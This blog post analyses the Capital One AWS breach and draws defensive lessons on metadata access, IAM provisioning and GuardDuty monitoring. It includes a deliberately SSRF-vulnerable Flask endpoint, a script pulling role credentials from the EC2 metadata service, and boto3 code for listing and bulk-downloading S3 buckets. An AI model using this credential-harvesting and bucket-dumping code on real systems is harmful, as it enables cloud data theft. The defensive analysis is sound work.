Early Lessons from the Capital One Data Breach

As more details about the Capital One breach are released in court filings and media reporting, we can start to look at where controls failed to prevent this breach and what lessons companies working in AWS can take away from this event. Based on initial court filings, the alleged attacker used three commands to access the Capital One data. The summary on page 6, line 14 of the DOJ complaint has been reported in the media as a trivial attack, but its wording indicates something more complex.

Using credentials associated with an IAM role

The summary also does not detail the work the attacker had to perform to arrive at the first command and obtain the credentials. This section indicates the attack may not have been as trivial as, say, a misconfigured S3 bucket. The wording points to the use of credentials associated with an IAM role. If that is the case, obtaining these credentials likely required a more complex vulnerability, because roles do not have long-lived credentials in the traditional sense; temporary credentials are generated by an AWS service when the role is used. Most commonly we see these credentials exposed in EC2 instance metadata when a role is assigned to an instance.

These credentials are temporary and designed to minimize the common problems associated with long-lived access keys assigned to an IAM user. The metadata service is only reachable from an internal endpoint on the EC2 instance, so to access it an attacker would need to exploit an application or server vulnerability. Role security credentials can be obtained from:

http://169.254.169.254/latest/meta-data/iam/security-credentials/

The most common method we see attackers use to access the metadata service is a Server-Side Request Forgery (SSRF) vulnerability: an application flaw that allows an attacker to make network requests as the application or another backend server. This could be legitimate functionality in an application that is abused to reach internal resources such as the EC2 metadata endpoint. Other methods we have seen include misconfigured proxy servers and poorly configured container setups.
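
To make the pattern concrete, below is a minimal sketch of an SSRF-style flaw, assuming a hypothetical Flask "URL preview" endpoint; it is purely illustrative and not based on the actual application involved in the breach.

# Hypothetical "URL preview" endpoint illustrating the SSRF pattern described
# above; not the actual vulnerable application.
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route("/preview")
def preview():
    # The application fetches whatever URL the client supplies.
    url = request.args.get("url", "")
    # An attacker can supply an internal address such as
    # http://169.254.169.254/latest/meta-data/iam/security-credentials/
    # and the request is made from inside the EC2 instance.
    resp = requests.get(url, timeout=3)
    return resp.text

if __name__ == "__main__":
    app.run()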

Once the attacker is able to reach the metadata service, they can enumerate the role metadata assigned to the instance, including the temporary security credentials that can be used to impersonate the role. The data is returned in this format:

{
  "Code" : "Success",
  "LastUpdated" : "2012-04-26T16:39:16Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "token",
  "Expiration" : "2017-05-17T15:09:54Z"
}
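
A rough sketch of that enumeration step, assuming requests made from (or proxied through) the instance itself, looks something like this:

# Sketch: enumerating role credentials from the EC2 metadata service.
import requests

METADATA = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# The base path returns the name of any role attached to the instance.
role_names = requests.get(METADATA, timeout=2).text.split()

# Appending a role name returns the temporary credentials shown above.
for name in role_names:
    creds = requests.get(METADATA + name, timeout=2).json()
    print(name, creds["AccessKeyId"], creds["Expiration"])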

Accessing the S3 bucket using the role credentials

Another significant aspect of this attack was being able to access the S3 bucket using the role credentials. This indicates the IAM role may have been over-provisioned with access to the S3 service, or that the exploited application/server was a management server that legitimately needed S3 access. It is not uncommon in large AWS environments for IAM access to be over-provisioned, although these details are currently unknown.
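
For illustration, a minimal sketch of using such temporary credentials against S3 with boto3 is shown below; the values are placeholders, not data from the breach.

# Sketch: using temporary role credentials with boto3. Placeholder values
# stand in for the JSON returned by the metadata service.
import boto3

creds = {
    "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "Token": "token",
}

session = boto3.Session(
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["Token"],
)
s3 = session.client("s3")

# If the role is over-provisioned, enumeration like this succeeds.
for bucket in s3.list_buckets()["Buckets"]:
    print(bucket["Name"])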

Using S3 sync to recursively copy the contents of specific buckets

The final command used S3 sync to recursively copy the contents of specific buckets. The complaint (page 8, line 4) indicates the downloaded files included those with a .snappy.parquet naming scheme. This file format is optimized for searching and analysis over large datasets, and a single file could have contained millions of records. The extent to which these files were distributed is currently unknown. However, multiple individuals were aware of the alleged attacker's public activities on Twitter and in a Slack channel named "Netcrave Communications". Capital One became aware of the breach via a disclosure to their vulnerability disclosure program.
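
As a reference for the copy step described above, here is a rough boto3 approximation of what a recursive copy such as "aws s3 sync" does; the bucket name is hypothetical, and the complaint describes the AWS CLI command, not this code.

# Rough approximation of a recursive bucket copy (what "aws s3 sync" automates),
# using a hypothetical bucket name.
import os
import boto3

s3 = boto3.client("s3")
bucket = "example-bucket"  # hypothetical

paginator = s3.get_paginator("list_objects_v2")
for page in paginator.paginate(Bucket=bucket):
    for obj in page.get("Contents", []):
        key = obj["Key"]
        if key.endswith("/"):  # skip folder placeholder objects
            continue
        dest = os.path.join("download", key)
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        # Each object, e.g. the *.snappy.parquet files, is copied locally.
        s3.download_file(bucket, key, dest)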

Early Lessons Learned

This is a developing story and a lot of information is still unknown. However, based on the details in the DOJ complaint, we can start to see some all-too-common problems faced by companies operating large AWS environments: unrestricted access to EC2 metadata, excessive IAM provisioning, and a lack of comprehensive monitoring.

Lesson 1: Limiting Access to EC2 Metadata

At this time AWS does not provide a scalable way to restrict access to EC2 metadata. If this was one of the vectors used in the attack, hopefully it pushes AWS to provide more scalable controls for metadata access. Currently, to mitigate this problem you are left with IAM condition keys or firewall/proxy controls in front of the metadata endpoint.

IAM policies support condition keys such as source IP or user agent. These can be applied to IAM roles to limit where the temporary security credentials can be used. You can restrict the source IP to the NAT gateway, or require a specific user agent that would be harder for an attacker to add to requests. This is not very scalable if you have a large number of NAT gateways and the list of source IPs is constantly changing. Further information is available in the AWS documentation on IAM condition keys.
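
A minimal sketch of this approach is shown below, assuming a hypothetical role name and NAT gateway IP; the exact policy would need to be adapted and tested for your environment.

# Sketch: deny use of a role's credentials from outside a known source IP.
# Role name and IP address are hypothetical placeholders.
import json
import boto3

iam = boto3.client("iam")

policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Deny",
            "Action": "*",
            "Resource": "*",
            "Condition": {
                # Requests not originating from the NAT gateway are denied,
                # which blocks credentials replayed from outside the VPC.
                "NotIpAddress": {"aws:SourceIp": ["203.0.113.10/32"]}
            },
        }
    ],
}

iam.put_role_policy(
    RoleName="example-app-role",      # hypothetical
    PolicyName="restrict-source-ip",
    PolicyDocument=json.dumps(policy),
)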

The other option is to block access to the metadata endpoint entirely using a host-based firewall such as iptables, or to place a proxy in front of the endpoint. Lyft and Netflix have released projects that offer a proxy option, allowing you to add further restrictions such as additional header checks.

Lesson 2: Excessive IAM Provisioning

Excessive IAM provisioning is all too common in large AWS environments. Tools exist to identify obvious IAM over-provisioning, such as a role having the AdministratorAccess policy attached. Things get harder when you have thousands of AWS accounts and no clear insight into how each account is being managed. Getting control of IAM policies at scale, making access granular, and auditing it are non-trivial in AWS. Newer offerings from AWS such as Organizations, AWS Landing Zone, and Control Tower can help with this problem by providing a way to standardize AWS account provisioning and security auditing across thousands of accounts. They should be accompanied by administrative controls with financial teams to prevent rogue AWS accounts from being created outside standard processes. These recommendations can require significant organizational changes and likely won't happen overnight.
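
As an illustration of the kind of check such tools perform, the sketch below flags roles with the AWS managed AdministratorAccess policy attached; it assumes read-only IAM access and, for brevity, ignores inline and customer managed policies.

# Sketch: flag IAM roles with the AdministratorAccess managed policy attached.
# Inline and customer managed policies are ignored for brevity.
import boto3

iam = boto3.client("iam")
ADMIN_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

paginator = iam.get_paginator("list_roles")
for page in paginator.paginate():
    for role in page["Roles"]:
        attached = iam.list_attached_role_policies(RoleName=role["RoleName"])
        if any(p["PolicyArn"] == ADMIN_ARN for p in attached["AttachedPolicies"]):
            print("Over-provisioned role:", role["RoleName"])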

A great tool for performing point-in-time audits of IAM principals (users, roles, etc.) is CloudMapper.

CloudMapper requires Security Audit access and runs against the AWS APIs to produce an IAM report of obvious misconfigurations and over-provisioning. You can also extend the tool with custom commands to help identify service-specific over-provisioning.

Ironically, Capital One has also released great open source tools for AWS compliance such as Cloud Custodian. This highlights the challenges faced by companies operating large scale cloud-based environments.

Lesson 3: Active Monitoring

Active monitoring for security events is a huge consideration within AWS. One available service that can provide a basic level of monitoring is GuardDuty. I am unsure whether all aspects of this attack would have been detected by GuardDuty; however, it does have findings available to detect misuse of instance credentials and the use of Tor to access the API or EC2 instances.
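
As a rough sketch, the relevant findings could be pulled with boto3 as shown below; the finding type names are taken from the GuardDuty documentation and may change over time.

# Sketch: query GuardDuty for instance-credential and Tor related finding types.
# Assumes a detector already exists; finding type names may vary.
import boto3

gd = boto3.client("guardduty")
detector_id = gd.list_detectors()["DetectorIds"][0]

criteria = {
    "Criterion": {
        "type": {
            "Eq": [
                "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration",
                "UnauthorizedAccess:IAMUser/TorIPCaller",
                "UnauthorizedAccess:EC2/TorClient",
            ]
        }
    }
}

finding_ids = gd.list_findings(DetectorId=detector_id,
                               FindingCriteria=criteria)["FindingIds"]
if finding_ids:
    findings = gd.get_findings(DetectorId=detector_id,
                               FindingIds=finding_ids)["Findings"]
    for finding in findings:
        print(finding["Type"], finding["Severity"])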

Summary

This breach shed some light on the challenges faced by large organizations using cloud providers at scale. It does not appear to have been as trivial as an exposed S3 bucket, but more likely a failure of multiple controls to stop an attacker. Preventing similar attacks will require cloud providers and organizations to continually work together to review IAM access and how credentials can be used.

This breach also shows the benefits of a vulnerability disclosure program. Without such a program there would be no direct communication channel for security researchers to report significant vulnerabilities or findings such as this data breach.